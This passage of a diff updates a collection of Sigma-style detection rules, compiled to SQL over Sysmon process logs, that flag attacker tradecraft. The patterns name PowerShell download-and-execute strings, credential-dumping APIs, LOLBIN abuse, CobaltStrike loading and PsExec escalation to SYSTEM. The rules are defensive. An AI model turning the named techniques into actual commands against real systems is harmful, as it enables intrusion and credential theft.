"Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - 
"attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE 
'\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' 
OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE 
'%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE 
'\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": 
"proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + 
"author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + 
"id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": 
"Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug 
Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR 
CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
